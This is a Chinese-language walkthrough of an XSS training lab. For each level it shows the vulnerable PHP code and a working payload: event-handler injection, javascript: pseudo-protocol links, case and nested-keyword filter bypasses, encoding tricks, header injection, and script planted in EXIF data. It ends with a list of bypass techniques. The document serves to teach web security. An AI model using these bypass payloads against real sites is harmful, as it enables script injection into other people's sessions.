1.第一題沒啥攔截和編碼,直接顯示,源代碼如下:
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>歡迎用戶".$str."</h2>";
payload:<script>alert(1)</script>
2.第二題的源代碼如下:
$str = $_GET["keyword"];
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>"."<center>
<form action=level2.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
payload:"><script>alert(1)</script>"這是直接把前面標簽閉合的意思
可以看到進行html特殊字符的編碼,經(jīng)過測試以后發(fā)現(xiàn),瀏覽器進行所謂的URL編碼,然后發(fā)送到服務器端解碼以后進行HTML實體編碼,對',",<,>,&符號進行編碼,注意單引號編碼不是默認的,然后返回前端被瀏覽器解析,還原成xss payload彈窗,所以這是html編碼只能防范存儲型漏洞的意思?
先看下去
3.第三題源碼如下:
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level3.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload: 123456' onfocus=alert(document.domain) autofocus//查了一下,網(wǎng)上說這個autofocus是當頁面加載時自動獲得焦點,然后onfocus是指定獲得焦點時應該觸發(fā)的事件.
顯然是做了代替,去掉了所有的大于小于號,那就只能用事件觸發(fā)了.
4.第四道同三
5.源代碼如下:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload:1"><iframe src=javascript:alert(1)>
經(jīng)測試,這道題目轉(zhuǎn)換了script和on標簽,那就嵌套或者偽協(xié)議
然后發(fā)現(xiàn)嵌套不行,因為這個是轉(zhuǎn)換來著.....不是直接凈化掉
然后就是直接上偽協(xié)議了.
6.源代碼如下:
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hRef=javascript:alert(1)>xss</a>>
這道題試了挺久,結(jié)果發(fā)現(xiàn)啥方法都不行,然后看了下答案,發(fā)現(xiàn),我去,居然沒做大小寫轉(zhuǎn)換...,直接大小寫繞過就可以了.
7.源代碼如下:
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hrhrefef=javasscriptcript:alert(1)>xss</a>>
主要嘗試了以后發(fā)現(xiàn)script標簽和href標簽都不見衔瓮,所以考慮嵌套的手段來繞過防護热鞍,最后使用<a>標簽來完成
8.源代碼如下:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level7.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';
?>
payload:javascript:alert(1)
經(jīng)過自己一波嘗試,發(fā)現(xiàn)全部轉(zhuǎn)小寫了偷办,然后是直接替換了澄港,on,href,script等關鍵詞語都被替換了,這種嵌套废岂,偽協(xié)議狱意,大小寫全都失效了详囤,只能看一波writeup,結(jié)果發(fā)現(xiàn)他是用編碼繞過的,可以可以。该贾。捌臊。。此處進行了html編碼來繞過六荒。
9.源代碼如下:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的鏈接不合法?有沒有卵皂!">友情鏈接</a></center>';}
else{echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';}
?>
payload:javascript:alert(1)//http://xxx.com
看源代碼可知道其實它里面會檢查有沒有http://在字符串里面灯变,如果沒有的話就直接跳轉(zhuǎn)不成功,然后凈化是先小寫滚粟,然后替換刃泌,所以還是采用Unicode編碼來繞,接著直接后面帶上http://,但是這里要使用//注釋符耙替,注釋掉后面的http://,不然會不成功俗扇。
10.源代碼如下:
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
payload:123456" onmouseover=alert(document.domain) type="text
第十題主要是要讓挑戰(zhàn)者學會看源代碼铜幽,這次是看不到,所以你只能看到輸入點除抛,輸出點是看不到的镶殷,需要手動把他找出來,這就需要找到hidden,在前端去掉之后把輸出點找出來,這里的輸出點是hidden,經(jīng)實測t_link和t_history不是輸出點颗管,所以不能用<,>然后就只能用事件輸出了滓走,這里用onmmouseover來觸發(fā)。
11.源代碼如下所示:
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
payload:1" onmouseover=alert(1)
這道題目和前面差不多,直接把hidden menu找出來然后直接上事件觸發(fā)就可以了。而其中這個hidden的值就是包頭里面的referer字段唯欣,所以burp抓包也是一樣的。
12.這道題目也是隱藏鍵值,然后改了user-agent的值插入xss代碼.
<input name="t_ua" value="Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" type="hidden">
修改為:
<input name="t_ua" value="1" onmouseover=alert(1)>
這里介紹一下wooyun上面一個上傳新思路瓢剿,通過上傳圖片修改圖片exif信息插入xss代碼间狂,平臺在查看xss代碼的時候就可以直接執(zhí)行了火架。
https://bugs.shuimugan.com/bug/view?bug_no=194934
13.如上:
14.該題目為cookie注入xss代碼,如下:
15.這道題目主要是讓人學習一波圖片上傳插入xss代碼的思路炼列,主要是學習利用exiftool改變圖片的exif信息即可俭尖。Kali中安裝了exiftool以后直接查看并修改插入洞翩,上傳以后如果網(wǎng)站程序會查看圖片exif信息的話那就會執(zhí)行這些代碼了。
確實是一個很騷的思路來著已亥。来屠。震鹉。捆姜。
整理一下xss繞過防護的思路:
1.大小寫繞過泥技,如果過濾了一些關鍵詞,比如script等珊豹,直接大小寫試試,對應的解決方案就是直接將輸入轉(zhuǎn)小寫蜕便,解決忽妒。
2.偽協(xié)議,即利用一些標簽,如img, iframe,a href等等鸯檬,eg:<iframe src=javascript:alert(1)>,對應防御偽協(xié)議可以直接過濾掉所謂的一些偽協(xié)議標簽就可以了螺垢。
3.嵌套,用于和大小寫繞過一樣的防護情況功茴。孽亲。。
4.事件觸發(fā)返劲,這樣可以處理一些過濾<,>等情況篮绿,例如onmouseover,onfocus等亲配,過濾on可解決。
5.善于利用注釋符號犬钢,注釋一些信息。
6.編碼繞過坡贺,例如stringformcharcode,html編碼繞過等等箱舞。
7.上傳圖片含有xss代碼的exif信息